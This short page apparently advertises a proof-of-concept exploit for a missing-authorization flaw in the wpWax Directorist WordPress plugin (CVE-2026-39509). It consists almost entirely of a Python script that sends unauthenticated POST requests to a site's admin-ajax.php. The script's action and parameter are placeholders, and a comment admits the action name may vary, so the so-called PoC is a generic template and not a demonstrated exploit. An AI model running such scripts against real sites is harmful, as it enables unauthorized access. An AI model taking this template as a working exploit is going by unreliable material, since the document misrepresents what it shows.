CVE-2026-39509 Directorist插件权限绕过漏洞

import requests # Exploit Title: wpWax Directorist < 8.5.10 - Missing Authorization PoC # Date: 2026-04-08 # Description: This script attempts to exploit the missing authorization vulnerability. target_url = "http://target-site.com/wp-admin/admin-ajax.php" # Payload targeting the vulnerable action (action name may vary based on plugin analysis) payload = { "action": "directorist_some_action", "param": "exploit_data" } try: # Sending unauthenticated request response = requests.post(target_url, data=payload) if response.status_code == 200: print("[+] Request sent successfully. Check if action was performed.") print("Response:", response.text[:200]) else: print(f"[-] Unexpected status code: {response.status_code}") except Exception as e: print(f"[!] Error occurred: {e}")